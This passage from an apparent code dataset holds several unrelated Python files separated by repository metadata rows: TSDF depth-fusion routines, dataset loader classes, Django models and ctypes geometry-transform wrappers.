camera.depth_unit_ratio,
field,
camera.intrinsics.intrinsic_matrix.astype(
np.float32),
camera_extrinsic_matrix.astype(np.float32),
array_offset,
voxel_size,
scale,
0.1,
gaussian_covariance_scale)
def generate_tsdf_2d_ewa_image(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 2D TSDF field based on elliptical Gaussian averages (EWA) of depth values from the provided image.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
with a circular 2D Gaussain filter before averaging the depth values.
:param narrow_band_width_voxels: desired width, in voxels, of the narrow band (non-truncated region) of the TSDF
:param array_offset: assumes camera is at array_offset voxels relative to TSDF grid
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param voxel_size: voxel size, in meters
:param default_value: default initial TSDF value
:param field_size:
:param depth_image:
:type depth_image: np.ndarray
:param camera:
:type camera: calib.camera.DepthCamera
:param image_y_coordinate:
:type image_y_coordinate: int
:param gaussian_covariance_scale: scaling of the 3D gaussian, which controls the amount of smoothing
:type gaussian_covariance_scale: float
:return: resulting 2D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit
if default_value == 1:
field = np.ones((field_size, field_size), dtype=np.float32)
elif default_value == 0:
field = np.zeros((field_size, field_size), dtype=np.float32)
else:
field = np.ndarray((field_size, field_size), dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
y_voxel = 0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera_intrinsic_matrix[0:2, 0:2].copy()
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for y_field in range(field_size):
for x_field in range(field_size):
x_voxel = (x_field + array_offset[0]) * voxel_size
z_voxel = (y_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
# distance along ray from camera to voxel
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
projection_jacobian = \
np.array([[1 / voxel_camera[2], 0, -voxel_camera[0] / z_cam_squared],
[0, 1 / voxel_camera[2], -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image[1] = image_y_coordinate
voxel_image = voxel_image.reshape(-1, 1)
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
depth_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
depth_sum += weight * surface_depth
weights_sum += weight
if depth_sum <= 0.0:
continue
final_depth = depth_sum / weights_sum
# signed distance from surface to voxel along camera axis
signed_distance = final_depth - voxel_camera[2]
field[y_field, x_field] = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
return field
def generate_tsdf_2d_ewa_tsdf(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 2D TSDF field based on elliptical Gaussian averages (EWA) of TSDF values based on corresponding depth
values from the provided image.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
with a circular 2D Gaussain filter before averaging the depth values.
:param narrow_band_width_voxels: desired width, in voxels, of the narrow band (non-truncated region) of the TSDF
:param array_offset: assumes camera is at array_offset voxels relative to TSDF grid
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param voxel_size: voxel size, in meters
:param default_value: default initial TSDF value
:param field_size:
:param depth_image:
:type depth_image: np.ndarray
:param camera:
:type camera: calib.camera.DepthCamera
:param image_y_coordinate: pixel row in the depth image to use for TSDF generation
:type image_y_coordinate: int
:param gaussian_covariance_scale: scaling of the 3D gaussian, which controls the amount of smoothing
:type gaussian_covariance_scale: float
:return: resulting 2D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit
if default_value == 1:
field = np.ones((field_size, field_size), dtype=np.float32)
elif default_value == 0:
field = np.zeros((field_size, field_size), dtype=np.float32)
else:
field = np.ndarray((field_size, field_size), dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
y_voxel = 0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera_intrinsic_matrix[0:2, 0:2].copy()
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for y_field in range(field_size):
for x_field in range(field_size):
x_voxel = (x_field + array_offset[0]) * voxel_size
z_voxel = (y_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
# distance along ray from camera to voxel
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
projection_jacobian = \
np.array([[1 / voxel_camera[2], 0, -voxel_camera[0] / z_cam_squared],
[0, 1 / voxel_camera[2], -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image[1] = image_y_coordinate
voxel_image = voxel_image.reshape(-1, 1)
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
tsdf_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
# signed distance from surface to voxel along camera axis
signed_distance = surface_depth - voxel_camera[2]
tsdf_value = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
tsdf_sum += weight * tsdf_value
weights_sum += weight
if weights_sum == 0.0:
continue
field[y_field, x_field] = tsdf_sum / weights_sum
return field
def generate_tsdf_2d_ewa_tsdf_inclusive(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 2D TSDF field based on elliptical Gaussian averages (EWA) of TSDF values based on corresponding depth
values from the provided image. When the sampling range for a particular voxel partially falls outside the image,
tsdf value of 1.0 is used during averaging for points that are outside.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
with a circular 2D Gaussain filter before averaging the depth values.
:param narrow_band_width_voxels: desired width, in voxels, of the narrow band (non-truncated region) of the TSDF
:param array_offset: assumes camera is at array_offset voxels relative to TSDF grid
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param voxel_size: voxel size, in meters
:param default_value: default initial TSDF value
:param field_size:
:param depth_image:
:type depth_image: np.ndarray
:param camera:
:type camera: calib.camera.DepthCamera
:param image_y_coordinate: pixel row in the depth image to use for TSDF generation
:type image_y_coordinate: int
:param gaussian_covariance_scale: scaling of the 3D gaussian, which controls the amount of smoothing
:type gaussian_covariance_scale: float
:return: resulting 2D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit
if default_value == 1:
field = np.ones((field_size, field_size), dtype=np.float32)
elif default_value == 0:
field = np.zeros((field_size, field_size), dtype=np.float32)
else:
field = np.ndarray((field_size, field_size), dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
y_voxel = 0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera_intrinsic_matrix[0:2, 0:2].copy()
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for y_field in range(field_size):
for x_field in range(field_size):
x_voxel = (x_field + array_offset[0]) * voxel_size
z_voxel = (y_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image[1] = image_y_coordinate
voxel_image = voxel_image.reshape(-1, 1)
x_image = voxel_image[0]
y_image = voxel_image[1]
margin = 3
if y_image < -margin or y_image >= depth_image.shape[0] + margin \
or x_image < -margin or x_image >= depth_image.shape[1] + margin:
continue
# distance along ray from camera to voxel
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
projection_jacobian = \
np.array([[1 / voxel_camera[2], 0, -voxel_camera[0] / z_cam_squared],
[0, 1 / voxel_camera[2], -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_inclusive_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
tsdf_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
if y_sample < 0 or y_sample >= depth_image.shape[0] \
or x_sample < 0 or x_sample >= depth_image.shape[1]:
tsdf_sum += weight * 1.0
else:
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
# signed distance from surface to voxel along camera axis
signed_distance = surface_depth - voxel_camera[2]
tsdf_value = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
tsdf_sum += weight * tsdf_value
weights_sum += weight
if weights_sum == 0.0:
continue
field[y_field, x_field] = tsdf_sum / weights_sum
return field
generate_tsdf_2d_ewa_functions = {
cpp_module.tsdf.FilteringMethod.EWA_IMAGE_SPACE: generate_tsdf_2d_ewa_image,
cpp_module.tsdf.FilteringMethod.EWA_VOXEL_SPACE: generate_tsdf_2d_ewa_tsdf,
cpp_module.tsdf.FilteringMethod.EWA_VOXEL_SPACE_INCLUSIVE: generate_tsdf_2d_ewa_tsdf_inclusive,
}
| 48.183544 | 117 | 0.609352 | 3,750 | 30,452 | 4.653867 | 0.0808 | 0.034667 | 0.018565 | 0.016846 | 0.887176 | 0.872106 | 0.844144 | 0.835205 | 0.822255 | 0.814749 | 0 | 0.023964 | 0.313477 | 30,452 | 631 | 118 | 48.259905 | 0.81082 | 0.219066 | 0 | 0.834646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006339 | 0 | 1 | 0.020997 | false | 0 | 0.015748 | 0 | 0.062992 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6ef170737ab9a84a8ad654085d6e9788cdaeeac8 | 2,986 | py | Python | src/data/layout.py | shendu-sw/TFR-HSS-Benchmark | 3fbc93ff548d924050e2de5070007197f04be7f4 | [
"MIT"
] | 7 | 2021-08-24T10:01:28.000Z | 2021-12-29T07:13:17.000Z | src/data/layout.py | idrl-lab/TFR-HSS-Benchmark | 3fbc93ff548d924050e2de5070007197f04be7f4 | [
"MIT"
] | null | null | null | src/data/layout.py | idrl-lab/TFR-HSS-Benchmark | 3fbc93ff548d924050e2de5070007197f04be7f4 | [
"MIT"
] | 1 | 2021-08-25T01:38:39.000Z | 2021-08-25T01:38:39.000Z | # -*- encoding: utf-8 -*-
"""Layout dataset
"""
import os
from .loadresponse import LoadResponse, LoadPointResponse, LoadVecResponse, mat_loader
class LayoutDataset(LoadResponse):
"""Layout dataset (mutiple files) generated by 'layout-generator'."""
def __init__(
self,
root,
list_path=None,
train=True,
transform=None,
target_transform=None,
load_name="u_obs",
resp_name="u",
):
test_name = os.path.splitext(os.path.basename(list_path))[0]
subdir = (
os.path.join("train", "train") if train else os.path.join("test", test_name)
)
# find the path of the list of train/test samples
list_path = os.path.join(root, list_path)
# find the root path of the samples
root = os.path.join(root, subdir)
super().__init__(
root,
mat_loader,
list_path,
load_name=load_name,
resp_name=resp_name,
extensions="mat",
transform=transform,
target_transform=target_transform,
)
class LayoutPointDataset(LoadPointResponse):
def __init__(
self,
root,
list_path=None,
train=True,
load_name="u_obs",
resp_name="u",
layout_name="F",
):
test_name = os.path.splitext(os.path.basename(list_path))[0]
subdir = (
os.path.join("train", "train") if train else os.path.join("test", test_name)
)
# find the path of the list of train/test samples
list_path = os.path.join(root, list_path)
# find the root path of the samples
root = os.path.join(root, subdir)
super().__init__(
root,
mat_loader,
list_path,
load_name=load_name,
resp_name=resp_name,
layout_name=layout_name,
extensions="mat",
)
class LayoutVecDataset(LoadVecResponse):
"""Layout dataset (mutiple files) generated by 'layout-generator'."""
def __init__(
self,
root,
list_path=None,
train=True,
transform=None,
div_num=4,
target_transform=None,
load_name="u_obs",
resp_name="u",
):
test_name = os.path.splitext(os.path.basename(list_path))[0]
subdir = (
os.path.join("train", "train") if train else os.path.join("test", test_name)
)
# find the path of the list of train/test samples
list_path = os.path.join(root, list_path)
# find the root path of the samples
root = os.path.join(root, subdir)
super().__init__(
root,
mat_loader,
list_path,
load_name=load_name,
resp_name=resp_name,
extensions="mat",
div_num=div_num,
transform=transform,
target_transform=target_transform,
)
| 26.660714 | 88 | 0.560281 | 346 | 2,986 | 4.598266 | 0.16185 | 0.067882 | 0.075424 | 0.052797 | 0.825896 | 0.825896 | 0.765556 | 0.752357 | 0.752357 | 0.72973 | 0 | 0.002519 | 0.335231 | 2,986 | 111 | 89 | 26.900901 | 0.798992 | 0.138312 | 0 | 0.819277 | 0 | 0 | 0.027451 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036145 | false | 0 | 0.024096 | 0 | 0.096386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e4d9924be93fd770fd6bd7bcf12837741c80db51 | 2,303 | py | Python | base_de_dados/usuarios/models.py | thaynagome/DjangoEscola | a6387a0932c0798234fb09a5768849e8796e4303 | [
"Apache-2.0"
] | null | null | null | base_de_dados/usuarios/models.py | thaynagome/DjangoEscola | a6387a0932c0798234fb09a5768849e8796e4303 | [
"Apache-2.0"
] | null | null | null | base_de_dados/usuarios/models.py | thaynagome/DjangoEscola | a6387a0932c0798234fb09a5768849e8796e4303 | [
"Apache-2.0"
] | 1 | 2019-05-09T00:26:07.000Z | 2019-05-09T00:26:07.000Z | from django.db import models
class categoria(models.Model):
nome = models.CharField(max_length=100)
dt_criacao = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.nome
class usuario(models.Model):
nome = models.CharField(max_length=100)
cpf = models.CharField(max_length=11, blank=True, null=True)
dtNascimento = models.DateField(blank=True, null=True, verbose_name='Data de nascimento')
nrTelCelular = models.CharField(max_length=11, blank=True, null=True, verbose_name='Nº telefone celular')
data_acesso = models.DateTimeField(auto_now_add=True)
categoria = models.ForeignKey(categoria, on_delete=models.CASCADE)
observacoes = models.TextField(null=True, blank=True)
class Meta:
verbose_name_plural = "usuarios"
def __str__(self):
return self.nome
class professor(models.Model):
nome = models.CharField(max_length=100)
cpf = models.CharField(max_length=11, blank=True, null=True)
dtNascimento = models.DateField(blank=True, null=True, verbose_name='Data de nascimento')
nrTelCelular = models.CharField(max_length=11, blank=True, null=True, verbose_name='Nº telefone celular')
salario = models.DecimalField(max_digits=7, decimal_places=2)
data_acesso = models.DateTimeField(auto_now_add=True)
categoria = models.ForeignKey(categoria, on_delete=models.CASCADE)
observacoes = models.TextField(null=True, blank=True)
class Meta:
verbose_name_plural = "professores"
def __str__(self):
return self.nome
class aluno(models.Model):
nome = models.CharField(max_length=100)
cpf = models.CharField(max_length=11, blank=True, null=True)
dtNascimento = models.DateField(blank=True, null=True, verbose_name='Data de nascimento')
nrTelCelular = models.CharField(max_length=11, blank=True, null=True, verbose_name='Nº telefone celular')
curso = models.CharField(max_length=100)
mensalidade = models.DecimalField(max_digits=7, decimal_places=2)
categoria = models.ForeignKey(categoria, on_delete=models.CASCADE)
data_acesso = models.DateTimeField(auto_now_add=True)
observacoes = models.TextField(null=True, blank=True)
class Meta:
verbose_name_plural = "alunos"
def __str__(self):
return self.nome | 41.125 | 109 | 0.737299 | 299 | 2,303 | 5.48495 | 0.210702 | 0.065854 | 0.120732 | 0.160976 | 0.929268 | 0.912805 | 0.878049 | 0.825 | 0.688415 | 0.688415 | 0 | 0.015955 | 0.156318 | 2,303 | 56 | 110 | 41.125 | 0.828101 | 0 | 0 | 0.733333 | 0 | 0 | 0.059028 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.022222 | 0.088889 | 0.933333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
901b05ad82dbba361342cea4fcbc199d9b430ccd | 131 | py | Python | pineboolib/fllegacy/flparameterquery.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | [
"MIT"
] | 2 | 2015-09-19T16:54:49.000Z | 2016-09-12T08:06:29.000Z | pineboolib/fllegacy/flparameterquery.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | [
"MIT"
] | 1 | 2017-08-14T17:07:14.000Z | 2017-08-15T00:22:47.000Z | pineboolib/fllegacy/flparameterquery.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | [
"MIT"
] | 9 | 2015-01-15T18:15:42.000Z | 2019-05-05T18:53:00.000Z | from pineboolib.application.database.pnparameterquery import PNParameterQuery
class FLParameterQuery(PNParameterQuery):
pass
| 21.833333 | 77 | 0.854962 | 11 | 131 | 10.181818 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 5 | 78 | 26.2 | 0.949153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
9036c20e4a113a0e27c0d8b02a144299c2a88179 | 5,579 | py | Python | src/IceRayPy/core/geometry/transform.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | [
"MIT-0"
] | 2 | 2020-09-04T12:27:15.000Z | 2022-01-17T14:49:40.000Z | src/IceRayPy/core/geometry/transform.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | [
"MIT-0"
] | null | null | null | src/IceRayPy/core/geometry/transform.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | [
"MIT-0"
] | 1 | 2020-09-04T12:27:52.000Z | 2020-09-04T12:27:52.000Z | import ctypes
import IceRayPy
import IceRayPy.type
import IceRayPy.type.math.affine
import IceRayPy.type.math.coord
Pointer = ctypes.POINTER
AddresOf = ctypes.addressof
#Scalar = IceRayPy.type.basic.Scalar
VoidPtr = IceRayPy.type.basic.VoidPtr
Integer = IceRayPy.type.basic.Integer
Coord3D = IceRayPy.type.math.coord.Scalar3D
Affine3D = IceRayPy.type.math.affine.Scalar3D
Matrix4D = IceRayPy.type.math.matrix.Scalar4D
class Identity:
def __init__( self, P_dll, P_child = None ):
self.m_cargo = {}
self.m_cargo['dll'] = P_dll
self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Identity0()
self.child( IceRayPy.core.geometry.simple.Sphere( P_dll ) )
def __del__( self ):
self.m_cargo['dll'].IceRayC_Geometry_Release( self.m_cargo['this'] )
self.m_cargo['child'] = None
def child(self):
return self.m_cargo['child'];
def child( self, P_child ):
self.m_cargo['child'] = P_child
self.m_cargo['dll'].IceRayC_Geometry_Transform_Identity_Child( self.m_cargo['this'], P_child.m_cargo['this'] )
class Translate:
def __init__( self, P_dll, P_child = None , P_move = None ):
self.m_cargo = {}
self.m_cargo['dll'] = P_dll
self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Translate0()
self.child( IceRayPy.core.geometry.simple.Sphere( P_dll ) )
if( None != P_child ):
self.child( P_child )
def __del__( self ):
self.m_cargo['dll'].IceRayC_Geometry_Release( self.m_cargo['this'] )
self.m_cargo['child'] = None
def child(self):
return self.m_cargo['child'];
def child( self, P_child ):
self.m_cargo['child'] = P_child
self.m_cargo['dll'].IceRayC_Geometry_Transform_Translate_Child( self.m_cargo['this'], P_child.m_cargo['this'] )
def move(self, P_move : Coord3D ):
return self.m_cargo['dll'].IceRayC_Geometry_Transform_Translate_Move( self.m_cargo['this'], AddresOf( P_move ) )
class Affine:
def __init__( self, P_dll, P_child = None , P_affine = None ):
self.m_cargo = {}
self.m_cargo['dll'] = P_dll
self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine0()
self.child( IceRayPy.core.geometry.simple.Sphere( P_dll ) )
if( None != P_child ):
self.child( P_child )
def __del__( self ):
self.m_cargo['dll'].IceRayC_Geometry_Release( self.m_cargo['this'] )
self.m_cargo['child'] = None
def child(self):
return self.m_cargo['child'];
def child( self, P_child ):
self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_Child( self.m_cargo['this'], P_child.m_cargo['this'] )
self.m_cargo['child'] = P_child
def toWorldGet( self ):
result = Affine3D()
self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2World_Get( self.m_cargo['this'], AddresOf( result ) )
return result
def toWorldSet( self, P_2world: Affine3D ):
return self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2World_Set( self.m_cargo['this'], AddresOf( P_2world ) )
def toLocalGet( self ):
result = Affine3D()
self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2Local_Get( self.m_cargo['this'], AddresOf( result ) )
return result
def toLocalSet( self, P_2local: Affine3D ):
return self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2Local_Set( self.m_cargo['this'], AddresOf( P_2local ) )
def move(self, P_move : Coord3D ):
pass #TODO;
def scaleV(self, P_move : Coord3D ):
pass #TODO;
def rotateX(self, P_alpha ):
pass #TODO;
def rotateY(self, P_alpha ):
pass #TODO;
def rotateZ(self, P_alpha ):
pass #TODO;
def rotateA(self, P_direction : Coord3D, P_alpha ):
pass #TODO;
class Homography:
def __init__( self, P_dll, P_child = None , P_affine = None ):
self.m_cargo = {}
self.m_cargo['dll'] = P_dll
self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography0()
self.child( IceRayPy.core.geometry.simple.Sphere(P_dll) )
if( None != P_child ):
self.child( P_child )
def __del__( self ):
self.m_cargo['dll'].IceRayC_Geometry_Release( self.m_cargo['this'] )
self.m_cargo['child'] = None
def child(self):
return self.m_cargo['child'];
def child( self, P_child ):
self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_Child( self.m_cargo['this'], P_child.m_cargo['this'] )
self.m_cargo['child'] = P_child
def toWorldGet( self ):
result = Matrix4D()
self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2World_Get( self.m_cargo['this'], AddresOf( result ) )
return result
def toWorldSet( self, P_2world: Matrix4D ):
return self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2World_Set( self.m_cargo['this'], AddresOf( P_2world ) )
def toLocalGet( self ):
result = Matrix4D()
self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2Local_Get( self.m_cargo['this'], AddresOf( result ) )
return result
def toLocalSet( self, P_2local: Matrix4D ):
return self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2Local_Set( self.m_cargo['this'], AddresOf( P_2local ) )
| 35.310127 | 130 | 0.640796 | 731 | 5,579 | 4.573187 | 0.091655 | 0.118456 | 0.185462 | 0.097218 | 0.843255 | 0.843255 | 0.808555 | 0.792402 | 0.763087 | 0.719115 | 0 | 0.008885 | 0.233375 | 5,579 | 157 | 131 | 35.535032 | 0.772738 | 0.01183 | 0 | 0.607143 | 0 | 0 | 0.043933 | 0 | 0 | 0 | 0 | 0.006369 | 0 | 1 | 0.276786 | false | 0.053571 | 0.044643 | 0.080357 | 0.473214 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
5f67c8e61bdd8fd2cfe6266b2e05f922471962da | 134 | py | Python | versions/util/__init__.py | DocTocToc/cleanerversion | becadbab5d7b474a0e9a596b99e97682402d2f2c | [
"Apache-2.0"
] | 121 | 2015-01-03T05:08:55.000Z | 2021-01-28T16:54:05.000Z | versions/util/__init__.py | DocTocToc/cleanerversion | becadbab5d7b474a0e9a596b99e97682402d2f2c | [
"Apache-2.0"
] | 115 | 2015-01-06T14:04:24.000Z | 2019-02-07T05:15:51.000Z | versions/util/__init__.py | DocTocToc/cleanerversion | becadbab5d7b474a0e9a596b99e97682402d2f2c | [
"Apache-2.0"
